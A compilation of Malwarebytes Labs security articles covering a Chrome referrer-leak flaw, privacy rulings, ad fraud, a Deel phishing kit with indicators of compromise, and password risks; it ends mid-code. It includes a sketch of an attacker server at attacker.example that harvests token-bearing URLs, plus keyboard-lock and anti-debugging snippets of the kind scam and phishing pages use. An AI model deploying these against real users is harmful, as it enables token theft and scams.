Malwarebytes Security
Update your Chrome to fix serious actively exploited vulnerability
Google released an emergency update for the Chrome browser to patch an actively exploited vulnerability that could have serious ramifications.
The update brings the Stable channel to versions 136.0.7103.113/.114 for Windows and Mac and 136.0.7103.113 for Linux.
The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.
To manually get the update, click Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is restart the browser for the update to complete and for you to be protected from this vulnerability.
This update is crucial since it addresses an actively exploited vulnerability that could allow an attacker to steal information you share with other websites. Google says it is aware that details about CVE-2025-4664 exist in the wild. And while Google stopped short of confirming active exploitation, the Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities catalog—a strong indication the vulnerability is being used out there.
Technical details
The vulnerability, tracked as CVE-2025-4664, lies in the Chrome Loader component, which handles resource requests. When you visit a website, your browser often needs to load additional pieces of that site, such as images, scripts, or stylesheets, which may come from various sources. The Loader manages these requests to fetch and display those resources properly.
While it does that, it should enforce security policies that prevent one website from accessing data belonging to another website, a principle known as the “same-origin policy.”
The vulnerability lies in the fact that those security policies were not applied properly to Link headers. This allowed an attacker to set a referrer policy in a Link header that tells Chrome to include full URLs, including sensitive query parameters, in requests to other sites.
This is undesirable since query parameters in full URLs often contain sensitive information such as OAuth tokens (used for authentication), session identifiers, and other private data.
Imagine you visit a website that handles sensitive financial information, and the URL includes a secret code in the address bar that proves it’s really you. Normally, when your browser loads images or other content from different websites, it keeps that secret code private. But because of this Chrome Loader flaw, a successful attacker could trick your browser into sending that secret code to a malicious website just by embedding an image or other resource there.
The attacker could, for example, embed a hidden image hosted on their own server and harvest the full URLs. This means they could steal your private information without you realizing it, potentially letting them take over your account or other online services.
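To make the mechanics more concrete, here is a hypothetical, simplified sketch (TypeScript for Node.js) of the attacker’s side of such a setup: a server for the embedded image that both asks the browser to apply a permissive referrer policy via a Link header and logs whatever Referer value arrives. The domains and header details are illustrative and not taken from an actual exploit.

```ts
// Hypothetical attacker-side sketch only; the domain, resource names, and the
// exact Link header parameter syntax Chrome honored are simplified here. The
// point is that once a permissive referrer policy applies, the full referring
// URL (query parameters included) arrives in the Referer header of requests
// for embedded resources, where the attacker can simply log it.
import { createServer } from "node:http";

createServer((req, res) => {
  // Whatever Referer the browser attached to this image request gets logged.
  // Under an "unsafe-url" style policy that can be the complete URL the victim
  // was on, e.g. https://bank.example/callback?token=SECRET.
  console.log("Harvested Referer:", req.headers.referer ?? "(none)");

  res.writeHead(200, {
    "Content-Type": "image/gif",
    // Ask the browser to preload another attacker resource while applying a
    // permissive referrer policy to that request.
    Link: '<https://attacker.example/pixel2.gif>; rel="preload"; as="image"; referrerpolicy="unsafe-url"',
  });
  res.end();
}).listen(8080);
```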
A week in security (May 12 – May 18)
Last week on Malwarebytes Labs:
- Data broker protection rule quietly withdrawn by CFPB
- Meta sent cease and desist letter over AI training
- Google to pay $1.38 billion over privacy violations
- Android users bombarded with unskippable ads
Last week on ThreatDown:
- ThreatDown introduces Firewall Management
- Introducing Browser Phishing Protection: enhanced web security for your organization
Stay safe!
Data broker protection rule quietly withdrawn by CFPB
The Consumer Financial Protection Bureau (CFPB) has decided to withdraw a 2024 rule to limit the sale of Americans’ personal information by data brokers.
In a Federal Register notice published yesterday, the CFPB said it “has determined that legislative rulemaking is not necessary or appropriate at this time to address the subject matter”.
The data brokerage industry generates an estimated $300 billion in annual revenue. Data brokers actively collect and sell your Personally Identifiable Information (PII), including financial details, personal behavior, and interests, for profit. They often do this without seeking your consent or without making it clear that you have given consent.
The CFPB proposed the rule in December 2024 to curb data brokers from selling Americans’ sensitive personal and financial information. By restricting the sale of personal identifiers such as Social Security Numbers (SSNs) and phone numbers, the rule aimed to ensure that companies share financial data, like income, only for legitimate purposes, such as facilitating a mortgage approval, rather than selling it on to scammers who target people in financial distress.
The proposal sought to make data brokers comply with federal law and address serious threats posed by current industry practices. It targeted not only national security, surveillance, and criminal exploitation risks, but also aimed to limit doxxing and protect the personal safety of law enforcement personnel and domestic violence survivors.
The CFPB intended to treat data brokers like credit bureaus and background check companies, requiring them to comply with the Fair Credit Reporting Act (FCRA) regardless of how they use financial information. The proposal would also have required data brokers to obtain much more explicit and separately authorized consumer consent.
Set up this way, the rule would not have interfered with the existing pathways created for and by the FCRA, while offering consumers more protection.
However, acting CFPB Director Russell Vought said the agency had determined the rule is not needed at this time, pointing to “updates to Bureau policies.”
Watchdog groups have a different view on the matter, though. Matt Schwartz, a policy analyst at Consumer Reports, said the withdrawal would leave consumers vulnerable:
“Data brokers collect a treasure trove of sensitive information about virtually every American and sell that information widely, including to scammers looking to rip off consumers.”
If data brokers were required to comply with the FCRA:
- They would have to ensure the accuracy and privacy of the data they collect and share.
- Consumers would have to be given mechanisms to dispute and correct inaccurate information.
- Consumers would have to be notified when their data is used for decisions about credit, insurance, or employment.
- Data brokers could face enforcement actions and penalties for non-compliance, as the Federal Trade Commission (FTC) and CFPB have pursued in the past.
Meta sent cease and desist letter over AI training
EU privacy advocacy group NOYB has clapped back at Meta over its plans to start training its AI model on European users’ data. In a cease and desist letter to the social networking giant’s Irish operation signed by founder Max Schrems, the non-profit demanded that it justify its actions or risk legal action.
In April, Meta told users that it was going to start training its generative AI models on their data.
Schrems uses several arguments against Meta in the NOYB complaint:
1. Meta’s ‘legitimate interests’ are illegitimate
NOYB continues to question Meta’s use of opt-out mechanisms rather than excluding all EU users from the process and requiring them to opt in to the scheme. “Meta may face massive legal risks – just because it relies on an ‘opt-out’ instead of an ‘opt-in’ system for AI training,” NOYB said on its site.
Companies that want to process personal data without explicit consent must demonstrate a legitimate interest in doing so under GDPR. Meta hasn’t published information about how it justifies those interests, says Schrems. He has trouble seeing how training a general-purpose AI model could be deemed a legitimate interest, because it violates a key GDPR principle: limiting data processing to specific purposes.
NOYB doesn’t believe that Meta can enforce GDPR rights for personal data like the right to be forgotten once an AI system is trained on it, especially if that system is an open-source one like Meta’s Llama AI model.
“How should it have a ‘legitimate interest’ to suck up all data for AI training?” Schrems said. “While the ‘legitimate interest’ assessment is always a multi-factor test, all factors seem to point in the wrong direction for Meta. Meta simply says that its interest in making money is more important than the rights of its users.”
2. What you don’t know can hurt you
Schrems warns that people who don’t have a Facebook account but just happen to be mentioned or caught in a picture on a user’s account will be at risk under Meta’s AI training plans. They might not even be aware that their information has been used to train AI, and therefore couldn’t object, he argues.
3. Differentiation is difficult
NOYB also worries that the social media giant couldn’t realistically separate people whose data is linked on the system. For example, what happens if two users are in the same picture, but one has opted out of AI training and one hasn’t? Or they’re in different geographies and one is protected under GDPR and one isn’t?
Trying to separate data gets even stickier when trying to separate ‘special category’ data, which GDPR treats as especially sensitive. This includes things like religious beliefs or sexual orientation.
“Based on previous legal submissions by Meta, we therefore have serious doubts that Meta can indeed technically implement a clean and proper differentiation between users that performed an opt-out and users that did not,” Schrems says.
Other arguments
People who have been entering their data into Facebook for the last two decades could not have been expected to know that Facebook would use that data to train AI now, the letter said. That data is private because Facebook tries hard to protect it from web scrapers and limits who can see it.
In any case, other EU laws would make the proposed AI training illegal, NOYB warns. It points to the Digital Markets Act, which stops companies from cross-referencing personal data between services without consent.
Meta, which says that it won’t train its AI on private user messages, had originally delayed the process altogether after pushback from the Irish Data Protection Commission. Last month the company said that it had “engaged constructively” with the regulator. There has been no further news from the Irish DPC on the issue aside from a statement thanking the European Data Protection Board for an opinion on the matter handed down in December. That opinion left the specifics of AI training policy up to national regulators.
“We also understand that the actions planned by Meta were neither approved by the Irish DPC nor other Concerned Supervisory Authorities (CSAs) in the EU/EEA. We therefore have to assume that Meta is openly disregarding previous guidance by the relevant Supervisory Authorities (SAs),” Schrems’ letter said.
NOYB has asked Meta to justify itself or sign a cease and desist order by May 21. Otherwise, it threatens legal action by May 27, which is the date that Meta is due to start its training. If it brings an action under the EU’s new Collective Redress Scheme, it could seek injunctions in jurisdictions outside Ireland to shut down the training process and delete the data. A class action suit might also be possible, Schrems added.
In a statement to Reuters, Meta called NOYB “wrong on the facts and the law”, saying that it gives users adequate opt-out options.
Google to pay $1.38 billion over privacy violations
The state of Texas reached a mammoth financial agreement with Google last week, securing $1.375 billion in payments to settle two three-year-old lawsuits.
The Office of Texas Attorney General Ken Paxton originally filed the first lawsuit against Google in January 2022, complaining that the tech giant collected users’ geolocation data. It alleged that Google had continued to track users’ locations even after they thought they had disabled the feature, and then used the data to serve them advertisements.
Then in May 2022, the state updated that lawsuit to include another allegation—that the company wasn’t being fully up front about the data it collected from users in private browsing mode, also known as Incognito Mode.
Google warned users on its Incognito Mode splash page that their ISPs, employers or schools, and the websites they visited in this mode might still collect data about their activity. The suit called this “insufficient to alert Texans to the amount, kind, and richness of data-collection that persists during Incognito mode.” By promising private browsing, Google created an expectation of privacy that it didn’t fulfill, it alleged.
In October that year, Texas launched another suit that accused Google of collecting biometric information, including voice prints and records of facial geometry, through services and products like Google Photos, Google Assistant, and the Nest Hub Max.
A collection of 40 states had pursued Google over the location tracking issue and secured a $391.5m payout in 2022, but others had gone it alone. Arizona settled for $85m. Paxton played his own game of Texas Hold’em and won. In a press release on Friday he proudly compared his settlement to the multi-state suit, pointing out that that settlement was “almost a billion dollars less than Texas’s recovery”.
This isn’t the first time that Paxton has trounced Google in a legal fight. In 2023 Texas was part of an all-state $700m settlement with the company over anti-competitive practices in its Play store. It also settled for $8m that year over a deceptive advertising claim. Google paid DJs to promote a new Pixel phone model even though it hadn’t been released yet and they had never used it, the state said.
Last August, it also won a four-year legal battle with Google over monopolistic search practices.
In financial terms, this is Paxton’s second-largest victory against Big Tech companies, and only by a whisker. Texas settled for a $1.4bn payout from Facebook and Instagram owner Meta last July, after suing it for capturing biometric data on Texans. The suit specifically targeted the company’s use of facial recognition to power its Tag Suggestions feature, which enabled users to easily identify and tag people in photos.
The allegations of biometric data misuse against both Meta and Google were brought under the Texas Capture or Use of Biometric Identifier Act, which the state introduced in 2009. The geolocation and private browsing accusations were brought under another Texas law, the Deceptive Trade Practices Act. At a federal level, there is still no cohesive consumer data privacy law, despite several efforts to introduce one on the Hill.
Emboldened by earlier victories, Paxton set up a legal swat team to pursue Big Tech last June. The team, which works within his office’s consumer division, will go after companies that play fast and loose with consumer data, Paxton said. He warned:
“As many companies seek more and more ways to exploit data they collect about consumers, I am doubling down to protect privacy rights.”
Android users bombarded with unskippable ads
Researchers have discovered a very versatile ad fraud network—known as Kaleidoscope—that bombards users with unskippable ads.
Normally, ad fraud is not a concern for users of infected devices. They might experience some sluggish behavior on their device, but often that’s the extent of it. Ad fraud is a type of scam aimed at companies, causing them to pay for advertisements that nobody actually sees or clicks on. Instead of real people viewing or clicking on ads, fraudsters use automated programs (bots) or other tricks to generate fake views, clicks, or interactions.
As a result, the advertising company pays for ads without receiving any real value in return. Users of infected devices usually don’t notice anything, since the malicious activity takes place in the background. This also helps the malware avoid detection.
However, the newly discovered ad fraud operation, dubbed Kaleidoscope, is different. Kaleidoscope targets Android users through seemingly legitimate apps in the Google Play Store, as well as malicious lookalikes distributed through third-party app stores.
Both versions of the app share the same app ID. Researchers found over 130 apps associated with Kaleidoscope, resulting in approximately 2.5 million fraudulent installs per month.
Advertisers believe they are paying for ads shown in the “legitimate” app, while users who download versions from third-party app stores are bombarded with the same ads—but they can’t skip them. Because both apps use the same app ID, advertisers never know the difference.
Kaleidoscope is very similar to, and appears to be built on, the CaramelAds ad fraud network, which also used duplicate apps and shares similarities in code and underlying infrastructure.
The researchers explain:
“The malicious app delivers intrusive out-of-context ads under the guise of the benign app ID in the form of full-screen interstitial images and videos, triggered even without user interaction.”
How to protect your device
Google Play Protect automatically protects users against apps that engage in malicious behavior. As a result, the researchers didn’t find any malicious Kaleidoscope versions on the Google Play Store.
To keep your devices free from ad fraud-related malware:
- Get your apps from the Google Play Store whenever you can.
- Be careful about the permissions you grant a new app. Does it really need those permissions for what it’s supposed to do? In this case, the “Display over other apps” permission should raise a red flag.
- Don’t allow dubious ad sites to display notifications. Allowing this will increase the number of ads, as they are pushed to the device’s notification bar.
- Use up-to-date and active security software on your Android.
Malwarebytes detects malware from the Kaleidoscope family as Adware.AdLoader.EXTNXN.
A week in security (May 4 – May 10)
Last week on Malwarebytes Labs:
- The AI chatbot cop squad is here (Lock and Code S06E09)
- Android fixes 47 vulnerabilities, including one zero-day. Update as soon as you can!
- “Your privacy is a promise we don’t break”: Dating app Raw exposes sensitive user data
- FBI issues warning as scammers target victims of crime
- WhatsApp hack: Meta wins payout over NSO Group spyware
- Passwords in the age of AI: We need to find alternatives
- Tired of Google sponsored ads? So are we! That’s why we’re introducing the option to block them on iOS
- Cyber criminals impersonate payroll, HR and benefits platforms to steal information and funds
- Google Chrome will use AI to block tech support scam websites
Last week on ThreatDown:
Stay safe!
Google Chrome will use AI to block tech support scam websites
Google has expressed plans to use Artificial Intelligence (AI) to stop tech support scams in Chrome.
With the launch of Chrome version 137, Google plans to use the on-device Gemini Nano large language model (LLM) to recognize and block tech support scams.
Users already have the ability to choose Enhanced Protection under Settings > Privacy and security > Security > Safe Browsing.
Google’s reasoning, which we agree with, is that LLMs are fairly good at understanding and classifying the varied, complex nature of websites. Since many malicious sites have a very short lifespan, it is more effective to learn and recognize their behavior than to keep adding a host of domain names to a blocklist (something Google itself has hampered with the introduction of Manifest V3, by the way).
Tech support scams typically follow a certain pattern that should be simple to learn:
- Make your browser tab full screen
- Display the number they want you to call all over the place
- Show the visitor fake ongoing scans and alerts
These are just a few of the characteristics I’d teach the LLM; I’m not speaking for Google here. Google itself only mentions that it will be looking at usage of the Keyboard Lock API.
On that note, the Keyboard Lock API is a web technology that allows websites to “capture” keyboard input, meaning they can prevent certain key combinations (or all keys) from working as they normally do in your browser or operating system. Originally, this API was designed for legitimate purposes, like making web games or remote desktop apps more immersive by stopping accidental key presses from interrupting the experience. But tech support scammers exploit the Keyboard Lock API to make it harder for victims to escape their scam pages. When a visitor tries to close the scam page or switch to another program, nothing happens, making them feel trapped on the site, which in turn makes them think their system really is infected.
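For reference, here is a minimal sketch of the standard web API combination involved (fullscreen plus Keyboard Lock). This is generic, documented API usage, not code from an actual scam page, and the type cast is only there because the Keyboard API is missing from some TypeScript DOM definitions.

```ts
// Minimal sketch of Fullscreen + Keyboard Lock, the combination scam pages
// abuse to make a tab feel inescapable. Must run from a user gesture (e.g. a
// click), because browsers gate both APIs behind user activation.
async function captureKeyboard(): Promise<void> {
  // Keyboard Lock only takes effect while the page is in fullscreen.
  await document.documentElement.requestFullscreen();

  // The Keyboard API may be missing from older TS DOM typings, hence the cast.
  const keyboard = (navigator as unknown as {
    keyboard?: { lock(keyCodes?: string[]): Promise<void> };
  }).keyboard;

  // Without arguments, lock() captures all keys the browser allows, including
  // Escape, so the usual "press Esc to exit fullscreen" escape hatch no longer
  // behaves the way users expect.
  await keyboard?.lock();
}

document.addEventListener("click", () => { void captureKeyboard(); });
```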
Google explains why it went for the on-device method, saying it allows Chrome to see threats at the same moment, and in the same way, that users see them.
“We’ve found that the average malicious site exists for less than 10 minutes, so on-device protection allows us to detect and block attacks that haven’t been crawled before.”
How it works
When the user lands on a page deemed suspicious, based on specific triggers like use of the Keyboard Lock API, Chrome provides the on-device LLM with the contents of that page and queries it to extract security signals, such as the intent of the page. This information is then sent to a Safe Browsing server for a final verdict.
If Safe Browsing decides the website is malicious, Chrome will block the content and show the user a big warning screen, called an “interstitial.”
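As a rough illustration of that two-step flow (and emphatically not Chrome’s actual implementation), the logic amounts to something like the sketch below, where a trivial stub stands in for Gemini Nano and the verdict endpoint is a placeholder.

```ts
// Purely illustrative sketch of the flow Google describes; this is not
// Chrome's actual code. A trivial stub stands in for the on-device Gemini
// Nano model, and the verdict endpoint URL is a placeholder.
type Signals = { intent: string; usesKeyboardLock: boolean };

// Stand-in for the on-device LLM: infer a coarse "intent" from page content.
async function extractSignalsOnDevice(pageText: string, usesKeyboardLock: boolean): Promise<Signals> {
  const scammy = /call .*support|your (pc|computer) is infected/i.test(pageText);
  return { intent: scammy ? "tech-support-scam-like" : "unknown", usesKeyboardLock };
}

async function evaluatePage(pageText: string, usesKeyboardLock: boolean): Promise<"allow" | "block"> {
  // Step 1: the on-device model turns the page contents into compact signals.
  const signals = await extractSignalsOnDevice(pageText, usesKeyboardLock);

  // Step 2: only those signals, not the full page, go to a server-side
  // Safe Browsing-style check for the final verdict.
  const res = await fetch("https://safe-browsing.example.invalid/verdict", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(signals),
  });
  const verdict: { malicious: boolean } = await res.json();

  // "block" corresponds to showing the full-screen interstitial warning.
  return verdict.malicious ? "block" : "allow";
}
```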
By making the target think their system is infected, tech support scammers try to gain remote access or obtain payment information. Google says:
“Tech Support scams are an increasingly prevalent form of cybercrime, characterized by deceptive tactics aimed at extorting money or gaining unauthorized access to sensitive data.”
Malwarebytes’ Browser Guard data over the last month shows that 30% of the fraudulent websites we blocked through the browser extensions are tech support scams.
So, it’s nice of Google to let Chrome help us take care of some of those, but Chrome is not the only browser. We’re even hearing stories from users who ran into a website telling them their Windows machine was infected while they were using the Safari browser on their iPad.
Cyber criminals impersonate payroll, HR and benefits platforms to steal information and funds
The relentless battle against online fraud is a constant evolution, a digital chase where security teams and malicious actors continually adapt. The increasing sophistication of attacks is blurring the lines between legitimate user behavior and impersonation attempts.
The campaign we are exposing today is a reminder that even the most advanced security technologies do not dissuade threat actors. We discovered a new phishing kit targeting payroll and payment platforms that aims to not only steal victims’ credentials but also to commit wire fraud.
Our investigation began with a fraudulent search ad for Deel, a payroll and human resources company. Clicking on the ad sent employees and employers to a phishing website impersonating Deel.
Besides stealing usernames and passwords and circumventing two-factor authentication, we identified malicious code capable of performing additional nefarious actions unbeknownst to the victim. Using a fully authenticated web worker, this phishing kit uses a legitimate hosted web service called Pusher with the intent of manipulating sensitive profile data fields related to banking and payment information.
While we were working this case, the FBI issued a public service announcement (PSA250424) warning that cyber criminals are using search engine advertisements to impersonate legitimate websites, and have expanded their targeting to payroll, unemployment programs, and health savings accounts, with the goal of stealing money through fraudulent wire transactions or redirecting payments.
The Google ad was taken down quickly, and we have informed Deel and MessageBird (Pusher’s parent company) about the misuse of their respective platforms.
Search results ad targets Deel
Deel is a US-based payroll and human resources company founded in 2019, whose platform is designed to streamline the complexities of managing a global workforce, offering solutions for payroll, HR, compliance, and more.
We first identified a malicious Google Search ad for Deel in mid-April for the keywords ‘deel login’. The top link was a sponsored search result, appearing just above the organic search result for Deel’s official website.
The URL in the ad (deel[.]za[.]com) uses ZA.COM, a subdomain of .COM aimed at South Africa and essentially an alternative to the .CO.ZA extension. That URL is used as a redirect only, allowing the threat actors to use cloaking in order to send clicks to decoy websites (a so-called white page) or to phishing domains they can rotate.
Phishing portal and 2FA
The first phishing domain we saw was login-deel[.]app, but at the time we checked it did not resolve. Shortly thereafter, the same Google ad URL pointed to a new domain, accuont-app-deel[.]cc.
The phishing page is a replica of Deel’s login page with one minor difference: the Log in using Google and Continue with QR code options are disabled, leaving only the username and password fields for authentication.
After entering their credentials, victims are socially engineered by the crooks into typing a security code that was sent to their email address. While two-factor authentication is a great added security feature, it can be rendered useless when victims authenticate to the wrong website.
On the surface, this looks just like another phishing site, until you look deeper and discover more intriguing code.
Traffic analysis
To better understand how this phishing kit works, we recorded a network capture showing the web requests sent and received. This allowed us to identify several interesting components that make this phishing campaign unique.
Of particular interest are several JavaScript libraries, namely pusher.min.js, Worker.js and kel.js.
The phishing kit uses anti-debugging techniques to prevent us from stepping through its code. This is a common practice to hide malicious intent and makes analysis more time consuming.
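For reference, client-side anti-debugging is usually nothing exotic. A common pattern, though not necessarily the exact one this kit uses, looks like the sketch below: it repeatedly hits a debugger statement and measures how long the page was paused, which reveals whether DevTools is open.

```ts
// Common client-side anti-debugging pattern (illustrative; not necessarily
// the exact technique this kit uses). If DevTools is open, the "debugger"
// statement pauses execution, so the elapsed time between checks balloons.
function detectDevTools(onDetected: () => void, thresholdMs = 100): void {
  setInterval(() => {
    const start = performance.now();
    // With DevTools closed this is effectively a no-op; with DevTools open,
    // execution pauses here until the analyst resumes it.
    debugger;
    if (performance.now() - start > thresholdMs) {
      onDetected(); // e.g. redirect away or stop loading the malicious payload
    }
  }, 1000);
}

detectDevTools(() => console.log("Debugger detected"));
```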
Scripts analysis
Looking at the files that the anti-debugger is trying to conceal, we see that only one is human readable, while the other two are heavily obfuscated using obfuscator.io. The pusher.min.js JavaScript file is a legitimate library from Pusher, a hosted web service that uses APIs, developer tools and libraries to manage connections between servers and clients using technologies like WebSockets.
There seem to be two different types of sessions, based on the functions named createBankSession and createCardSession. When attempting to log in to the phishing site, we see a session_type value of “bank”, which belongs to the former function.
The kel.js and Worker.js files are both used for authenticating the victim into the real Deel website, while a web worker communicates with the threat actor’s infrastructure to process the credentials and to receive the OTP code needed to get past two-factor authentication.
WebSocket is a persistent communication protocol that allows for full-duplex communication between a user’s browser and a server. This means data can be pushed from the server to the client in real time without the client having to constantly request it.
Here’s an example of a WebSocket communication where the user provided the wrong login credentials:
The conversation begins with a pusher:connection_established message, confirming a successful connection to the Pusher real-time service and providing a unique socket_id and an activity_timeout of 120 seconds.
Next, a pusher:subscribe message shows the client requesting to listen for events on a specific channel identified by a unique session ID, indicating a desire to receive real-time updates for that session.
The server then acknowledges this request with a pusher_internal:subscription_succeeded message for the same channel, confirming that the client is now successfully subscribed and will receive broadcasts.
Finally, an events message is received on that session channel, carrying data indicating a “wrongLogin” event has occurred and instructing the client-side application to “Show” something, likely an error message to the user in real-time.
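To picture what that exchange looks like in client code, here is a minimal sketch using the public pusher-js library; the app key, cluster, and channel name are placeholders, and only the “wrongLogin” event name comes from the captured traffic.

```ts
// Illustrative sketch of the client-side Pusher flow described above, using
// the public pusher-js library. App key, cluster, and channel name are
// placeholders; "wrongLogin" is the event name seen in the captured traffic.
import Pusher from "pusher-js";

const pusher = new Pusher("APP_KEY_PLACEHOLDER", { cluster: "mt1" });

// Each victim session gets its own channel, keyed on a unique session ID,
// so the operator's backend can push verdicts for that session in real time.
const channel = pusher.subscribe("session-PLACEHOLDER");

// A "wrongLogin" event tells the page what to display to the victim, e.g.
// an error prompting them to re-enter their credentials.
channel.bind("wrongLogin", (data: { action?: string }) => {
  console.log("Received event:", data); // e.g. { action: "Show" }
});
```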
Additional targets
This phishing kit is unique and can be tracked with the following characteristics:
- Obfuscator.io
- Pusher WebSockets
- Worker.js library
- kel.js/otp.js/auth.js/jquery.js library
We identified several other targets, related to payroll, HR, billing, payment solutions and even commerce platform Shopify. The earliest use we could find goes back to July 2024, but it appears to have flown under the radar.
Justworks: Payroll, benefits, HR, and compliance — all in one place.
Marqeta: End-to-end credit and payment solutions integrated into business processes.
Shopify: Commerce platform.
OmniFlex (Worldpay): Online point-of-sale solution.
Conclusion
The FBI’s PSA highlights several key measures businesses can adopt to protect users in the following areas:
- Domain spoofing: Brand impersonation is a real problem that companies need to proactively look out for.
- Notifications: Victims need to be alerted in several different ways in a timely manner.
- Education: Phishing is getting more sophisticated and users need to be aware of how to best protect themselves.
In that same report, the FBI advises consumers to check the URL to make sure the site is authentic before clicking on an advertisement. This is usually sound practice but, as we have documented on this blog many times, URLs within ads can be spoofed as well.
Ultimately, the discovery of this phishing kit, with its advanced capability to interact with financial data, reinforces a critical message: online security is a shared responsibility. Users must exercise caution and critical thinking in their online interactions while enhancing their security with available tools; platforms must remain committed to detecting and preventing abuse.
Browser extensions such as Malwarebytes Browser Guard will block not only the ads but also the scam or malware sites associated with these schemes.
Indicators of Compromise
Redirect
deel[.]za[.]com
Phishing domains
login-deel[.]app
accuont-app-deel[.]cc
justvvokrs-login[.]cc
vye-starr[.]net
maqreta[.]com
ctelllo[.]com
angelistt[.]com
account[.]datedeath[.]com
account[.]turnkeycashsite[.]com
admin-shopffy[.]cc
biilll[.]com
app-parker[.]com
shluhify[.]com
login-biil[.]net
founderga[.]com
admin-shoopiffy[.]com
access-shupfify[.]com
virluaterminal[.]net
Worker.js (SHA256)
56755aaba6da17a9f398c3659237d365c52d7d8f0af9ea9ccde82c11d5cf063f
kel.js/otp.js/auth.js/jquery.js (SHA256)
72864bd09c09fe95360eda8951c5ea190fbb3d3ff4424837edf55452db9b36fb
6fb006ecc8b74e9e90d954fa139606b44098fc3305b68dcdf18c5b71a7b5e80f
908a128f47b7f34417053952020d8bbdacf3aed1a1fcf4981359e6217b7317c9
5dadc559f2fb3cff1588b262deb551f96ff4f4fc05cd3b32f065f535570629c3
0ef66087d8f23caf2c32cc43db010ffe66a1cd5977000077eda3a3ffce5fa65f
95d008f7f6f6f5e3a8e0961480f0f7a213fa7884b824950fe9fb9e40d918a164
3e4e78a3e1c6a336b17d8aed01489ab09425b60a761ff86f46ab08bfcf421eac
a37463862628876cecfc4f55c712f79a150cdc6ae3cf2491a39cc66dadcf81eb
15606c5cd0e536512a574c508bd8a4707aace9e980ab4016ce84acabed0ad3be
81bcf866bd94d723e50ce791cea61b291e1f120f3fc084dc28cbe087b6602573
1665387c632391e26e1606269fb3c4ddbdf30300fa3e84977b5974597c116871
c56e277fd98fc2c28f85566d658e28a19759963c72a0f94f82630d6365e62c4f
Tired of Google sponsored ads? So are we! That’s why we’re introducing the option to block them on iOS
Sponsored ads on Google search don’t just irritate users—they also provide a dangerous opportunity for cybercriminals to spread malware and scams to their unsuspecting victims. What looks like a harmless search result can be a carefully disguised trap.
At Malwarebytes, our researchers have uncovered a variety of threats hiding in plain sight within these sponsored ads, including Mac stealers distributed through Google Ads, scams targeting popular utility software, and tech support traps.
In some cases, scammers use advanced AI tools like DeepSeek AI to create convincing ads and web pages, increasing the risk to unsuspecting users.
That’s why we’re excited to roll out a brand new feature in Malwarebytes for iOS: the ability to block Google sponsored ads directly on Safari.
If you’ve used our iOS app before, you already know it blocks ads on webpages and ad trackers. But with our newest feature, we’re extending protection to cover those annoying and potentially dangerous sponsored ads listed on search results.
Now, with just a simple toggle, you can make those annoying sponsored ads disappear from your Safari browsing experience.
Try it for yourself: Download Malwarebytes for iOS and enjoy this feature—alongside scam text filtering, a privacy VPN, and call protection—with a free seven-day trial.
Existing users should already have this feature option in their app—check it out now!
Don’t have an iOS device? Download our free Browser Guard extension for ad blocking and scam protection while browsing on your desktop.
Passwords in the age of AI: We need to find alternatives
For decades, passwords have been our default method for keeping online accounts safe. But in the age of artificial intelligence, this traditional security method is facing challenges it was never built to withstand.
A team at Cybernews conducted a study of over 19 billion newly exposed passwords, which showed we’re looking at “a widespread epidemic of weak password reuse.” It shows that despite years of trying to educate users about the dangers of using weak, lazy passwords and reusing them across different sites and services, we have hardly made any progress.
But our opponents have. They have new tools and faster computers, and thanks to both they need less effort for a greater yield. Meanwhile, our digital presence has grown enormously, and with it the number of passwords we use and the importance of the information they can unlock.
Enter AI
Artificial Intelligence (AI)-powered tools are now capable of cracking passwords faster and more efficiently than ever before. What once took days or weeks using brute force can now be accomplished in minutes. Tools like PassGAN (Password Generative Adversarial Network) use deep learning to predict and generate likely passwords based on leaked data sets. Unlike traditional dictionary attacks, AI doesn’t rely solely on existing word lists. AI is able to learn patterns from billions of compromised passwords and create new ones that closely mimic real human behavior.
This represents a huge advantage to the attackers. While a human hacker might guess that someone used their pet’s name followed by the year they were born, an AI can deduce that “Fluffy2023!” is statistically probable based on thousands of other similar combinations. And it can do this millions of times per second.
AI’s password-cracking capabilities are further supercharged by powerful hardware. Graphics processing units (GPUs), which are commonly used in gaming and scientific computing, can now be harnessed to run password-cracking algorithms at scale. Combined with AI, these machines make short work of weak or even moderately complex passwords.
The result is a world where even passwords once considered strong, like “Tr33House!”, may no longer provide meaningful protection.
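To put rough numbers on that, here is a back-of-the-envelope sketch of the naive, worst-case brute-force math; the point is that pattern-aware guessing (a dictionary word, leet substitutions, a punctuation suffix) collapses the effective search space far below this estimate.

```ts
// Naive keyspace-based crack-time estimate, assuming a fixed guess rate.
// This is the *worst case* for an attacker; AI- and pattern-guided guessing
// tries likely candidates first and does dramatically better in practice.
function naiveCrackTimeSeconds(password: string, guessesPerSecond: number): number {
  const pools = [
    { re: /[a-z]/, size: 26 },
    { re: /[A-Z]/, size: 26 },
    { re: /[0-9]/, size: 10 },
    { re: /[^a-zA-Z0-9]/, size: 33 }, // printable ASCII symbols
  ];
  // Alphabet size = sum of the character classes actually used.
  const alphabet = pools.reduce((n, p) => n + (p.re.test(password) ? p.size : 0), 0);
  // Worst case: the attacker has to try the entire keyspace.
  return Math.pow(alphabet, password.length) / guessesPerSecond;
}

// "Tr33House!" uses all four character classes over 10 characters, so the
// naive math looks reassuring at, say, a trillion guesses per second...
console.log(naiveCrackTimeSeconds("Tr33House!", 1e12));
// ...but an attacker guessing "dictionary word + leet digits + '!'" patterns
// never has to search anywhere near that full space.
```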
Does that make the password obsolete?
Tech companies are already betting on a passwordless future. Passkeys, biometrics, and multi-factor authentication (MFA) are gaining traction. Passkeys, in particular, offer a cryptographic alternative that eliminates the need for users to remember or even create passwords at all. But adoption of passkeys is still in the early stages, and many systems still rely on traditional passwords.
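For a sense of why passkeys sidestep the guessable-secret problem, this is roughly what creating one looks like from the browser side using the standard WebAuthn API; the relying-party and user details are placeholders, and in a real flow the challenge and user ID come from the server.

```ts
// Minimal sketch of browser-side passkey creation via WebAuthn
// (navigator.credentials.create). Relying-party details, user info, and the
// challenge are placeholders; real flows get the challenge and user ID from
// the server, which then verifies and stores the resulting public key.
async function createPasskey(): Promise<Credential | null> {
  const challenge = crypto.getRandomValues(new Uint8Array(32)); // server-issued in practice

  return navigator.credentials.create({
    publicKey: {
      challenge,
      rp: { name: "Example Service" },
      user: {
        id: crypto.getRandomValues(new Uint8Array(16)), // opaque user handle
        name: "user@example.com",
        displayName: "Example User",
      },
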